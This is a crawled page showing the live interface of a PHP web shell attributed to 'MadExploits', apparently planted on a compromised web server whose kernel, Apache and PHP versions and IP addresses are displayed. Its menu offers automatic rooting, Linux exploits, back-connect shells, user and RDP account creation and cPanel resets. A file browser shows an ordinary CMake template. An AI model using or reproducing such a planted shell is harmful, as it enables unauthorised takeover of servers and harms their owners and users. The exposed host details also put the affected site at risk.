Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.216
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
cmake3 /
Templates /
[ HOME SHELL ]
Name
Size
Permission
Action
MSBuild
[ DIR ]
drwxr-xr-x
Windows
[ DIR ]
drwxr-xr-x
AppleInfo.plist
1.14
KB
-rw-r--r--
CMakeVSMacros1.vsmacros
86
KB
-rw-r--r--
CMakeVSMacros2.vsmacros
62
KB
-rw-r--r--
CPack.GenericDescription.txt
138
B
-rw-r--r--
CPack.GenericLicense.txt
101
B
-rw-r--r--
CPack.GenericWelcome.txt
96
B
-rw-r--r--
CPackConfig.cmake.in
751
B
-rw-r--r--
CTestScript.cmake.in
1.4
KB
-rw-r--r--
TestDriver.cxx.in
3.68
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : CPackConfig.cmake.in
# This file will be configured to contain variables for CPack. These variables # should be set in the CMake list file of the project before CPack module is # included. The list of available CPACK_xxx variables and their associated # documentation may be obtained using # cpack --help-variable-list # # Some variables are common to all generators (e.g. CPACK_PACKAGE_NAME) # and some are specific to a generator # (e.g. CPACK_NSIS_EXTRA_INSTALL_COMMANDS). The generator specific variables # usually begin with CPACK_<GENNAME>_xxxx. @_CPACK_OTHER_VARIABLES_@ if(NOT CPACK_PROPERTIES_FILE) set(CPACK_PROPERTIES_FILE "@CMAKE_BINARY_DIR@/CPackProperties.cmake") endif() if(EXISTS ${CPACK_PROPERTIES_FILE}) include(${CPACK_PROPERTIES_FILE}) endif()
Close